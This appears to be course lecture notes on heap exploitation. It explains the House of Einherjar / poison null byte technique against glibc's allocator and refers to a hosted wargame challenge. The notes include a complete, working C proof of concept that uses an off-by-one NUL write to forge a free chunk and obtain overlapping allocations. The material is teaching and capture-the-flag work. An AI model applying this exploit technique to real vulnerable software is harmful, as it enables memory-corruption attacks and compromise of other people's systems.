We're at the end of the course and I wanted to make sure we at least hinted at the various types of techniques out there.
Part of this is inspired by a problem from last year's DEFCON: MOOOSL
This problem was a heap problem built on a very different libc implementation (musl), which ships with Alpine Linux, a very lightweight distribution.
We've gotten very familiar with glibc's implementation, but other allocators are out there: ARM-first versions, embedded versions, docker-friendly versions like this one, and, with a special place on my list, Rust, whose claim to fame is being a memory-safe alternative to C.
They ALL NEED dynamic memory allocation, and you will find yourself needing to take the concepts from these C exploits and move them into a foreign allocator.
(OK, I want to pause for a second on the phrase "you will", from the perspective of how best to use a classroom experience in your real life)
So here are some concepts that seem to always be around and that I suspect you have a good chance of finding in other allocators:
Those last ones we haven't really put a spotlight on, so today I'm going to attempt to put a spotlight on a couple at the same time by looking at the House of Einherjar
This is super similar to the House of Force.
In House of Force we tweaked the top chunk's size and then asked for a REALLY LARGE chunk.
In House of Einherjar we clear a chunk's prev_inuse flag (an off-by-one null byte into the low byte of its size field is enough) and control its prev_size field (which is just the last 8 bytes of our own, preceding chunk's data), so that freeing it makes glibc consolidate backward, WAY BACK in memory, to a fake chunk wherever we want.
To do this we need:
The target address can be anywhere, but it is often just another chunk in the heap (in which case we have made overlapping chunks); that version of the attack is called the poison null byte. Whatever we point at has to look like a real free chunk to unlink: its fd->bk and bk->fd must point back to it, and since glibc 2.26 its size must equal the prev_size we planted (that is also why the technique needs a heap leak, or at least an address we know).
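Here is the heap-resident (poison null byte) version of the technique as a worked example. This is an added example written for these notes, not code from the wargames or from the MOOOSL challenge, and it targets glibc (2.23 through the 2.3x series); the helper names (vuln_copy, house_of_einherjar_demo) and the choice of 0x500-byte chunks are mine. The chunk size is chosen above the tcache and fastbin limits so free() takes the consolidation path on every glibc version, and the fake chunk is built inside our own buffer a, so the consolidated chunk lands back on top of a and the next malloc returns a pointer that overlaps it. The layout checks at the top make the function fail cleanly with a code instead of crashing if the allocator is not glibc or the heap is not fresh.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Request 0x4f8 bytes -> chunk size 0x500, which is above the tcache limit
 * (0x410) and the fastbin limit, so free() consolidates instead of caching. */
#define REQ   0x4f8
#define CHUNK (REQ + 8)   /* 0x500: request plus the size field, 16-byte aligned */

/* The bug: copy exactly n bytes, then NUL-terminate one byte past the end.
 * With n == the usable size, that NUL lands on the next chunk's size field. */
static void vuln_copy(char *dst, const char *src, size_t n)
{
    memcpy(dst, src, n);
    dst[n] = '\0';   /* off-by-one: 0x501 -> 0x500, prev_inuse cleared */
}

/* Returns 0 when the overlapping pointer is obtained; a small nonzero code
 * tells "layout assumption did not hold" apart from "technique failed". */
int house_of_einherjar_demo(void)
{
    char *a     = malloc(REQ);   /* victim buffer with the off-by-one */
    char *b     = malloc(REQ);   /* chunk whose prev_inuse we clear and then free */
    char *guard = malloc(REQ);   /* keeps b away from the top chunk */
    if (!a || !b || !guard) return 1;

    /* Assumption: three fresh, adjacent chunks carved from the top chunk. */
    if (b - a != CHUNK || guard - b != CHUNK) return 2;
    size_t *b_size = (size_t *)(b - 8);
    if (*b_size != (CHUNK | 1)) return 3;   /* 0x501: size | PREV_INUSE */

    /* The fake chunk lives at the very start of a's user data, so its chunk
     * address is `a` itself: [prev_size][size][fd][bk][fd_nextsize][bk_nextsize]. */
    size_t *fake = (size_t *)a;
    size_t fake_size = (size_t)((b - 16) - a);   /* distance to b's header: 0x4f0 */

    char payload[REQ];
    memset(payload, 'A', sizeof payload);
    size_t hdr[6] = {
        0,                 /* prev_size of the fake chunk: never read */
        fake_size | 1,     /* size: chunksize() must equal the prev_size planted in b */
        (size_t)fake,      /* fd -> self, so fd->bk == fake passes unlink */
        (size_t)fake,      /* bk -> self, so bk->fd == fake passes unlink */
        0, 0               /* NULL nextsize pointers skip the large-bin checks */
    };
    memcpy(payload, hdr, sizeof hdr);
    /* The last 8 bytes of a's usable area ARE b's prev_size field. */
    memcpy(payload + REQ - 8, &fake_size, sizeof fake_size);

    vuln_copy(a, payload, REQ);             /* plant fake chunk + prev_size, clear prev_inuse */
    if (*b_size != CHUNK) return 4;         /* 0x500 now: prev_inuse bit is gone */

    /* free(b): prev_inuse is clear, so glibc walks back prev_size bytes to our
     * fake chunk, checks size == prev_size and the fd/bk back-pointers, unlinks
     * it, and files the merged 0x4f0 + 0x500 = 0x9f0 chunk in the unsorted bin.
     * (Its fd/bk, written into a's data, are now main_arena pointers: a libc leak.) */
    free(b);

    /* The next large request is carved from the merged chunk, whose user
     * pointer is a + 16: it overlaps the still-live buffer a. */
    char *c = malloc(REQ);
    if (c != a + 16) return 5;

    memset(c, 'C', 64);                     /* writing through c ... */
    return memcmp(a + 16, "CCCCCCCC", 8) == 0 ? 0 : 6;   /* ... is visible through a */
}

int main(void)
{
    int rc = house_of_einherjar_demo();
    printf("house of einherjar: %s (rc=%d)\n",
           rc == 0 ? "overlapping chunk obtained" : "failed", rc);
    return rc;
}
```

The stack version of the attack from the wargames is the same dance with a fake chunk on the stack, but then the merged size is gigantic and trips the size <= system_mem checks in malloc on newer glibc, which is why the modern write-ups pair it with tcache poisoning instead of just allocating from the merged chunk.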
Let's look at it in the wargames:
wargames: house_of_einherjar (the 2.23 version, but the technique applies up to 2.34)
Of our 25 problems, problem 20 (AUIR) is one of these.
I've hosted that one at: nc 165.22.46.243 8899
files you need: auir.zip